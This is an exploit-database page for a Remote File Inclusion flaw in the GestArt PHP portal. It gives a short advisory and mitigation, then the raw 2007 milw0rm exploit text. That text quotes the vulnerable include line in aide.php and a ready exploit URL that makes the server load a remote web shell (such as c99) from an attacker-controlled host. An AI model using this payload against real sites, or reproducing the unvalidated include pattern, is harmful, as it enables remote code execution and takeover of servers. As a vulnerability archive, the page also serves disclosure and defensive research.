header-logo
Suggest Exploit
vendor:
GestArt
by:
Dj7xpl
7.5
CVSS
HIGH
Remote File Inclusion
CWE
Product Name: GestArt
Affected Version From:
Affected Version To:
Patch Exists: No
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Remote File Inclusion Exploit in GestArt

The GestArt portal is vulnerable to Remote File Inclusion. The 'aide.php' script includes a file based on user input without proper validation, allowing an attacker to include arbitrary files from a remote server. This can lead to remote code execution and compromise the target system.

Mitigation:

To mitigate this vulnerability, the developer should validate and sanitize user input before including files. It is also recommended to restrict file inclusion to specific directories and avoid including files from remote servers.
Source

Exploit-DB raw data:

                                                          .-""""""""-.                                 
                                                         /   Dj7xpl   \                              
                                                        |              |                                
                                                        |,  .-.  .-.  ,|                                
                                                        | )(_o/  \o_)( |                                     
                                                        |/     /\     \|                                 
                                              (@_       (_     ^^     _)                  
                                         _     ) \_______\__|IIIIII|__/_______________________________
                                        (_)@8@8{}<________|-\IIIIII/-|________________________________>
                                               )_/        \          / 
                                               (@
											   
+_______________________________________________Iranian Are The Best In World___________________________________________+
#
#
#   Portal     :   GestArt 
#   Download   :   http://www.phpscripts-fr.net/scripts/scripts.php?cat=Gestion
#   Author     :   Dj7xpl  | Dj7xpl@yahoo.com
#   Risk       :   High (Remote File Inclusion Exploit)
#
+_______________________________________________________________________________________________________________________+


+-------------**************************************** aide.php *********************************************-----------+
#
#
#    <? include("$aide.txt");?> </p>    <<<< line (21)
#
#
+-------------***********************************************************************************************-----------+

+_______________________________________________________________________________________________________________________+
#
#
#    Exploit  :  http://[target]/[path]/aide.php?aide=http://evilsite/shell         <<<<  Shell (Text File)
#    Example  :  http://localhost/getart/aide.php?aide=http://localhost/c99         <<<<  c99.txt
#
+_______________________________________________________________________________________________________________________+

+_______________________________________________________________________________________________________________________+
#
#
#    Sp Tnx      :  Milw0rm, Ashiyane, Delta Hacking, Virangar, Hacker.ir, Shabgard.org,Simorgh .............
#
#
+_______________________________________________________________________________________________________________________+

# milw0rm.com [2007-03-13]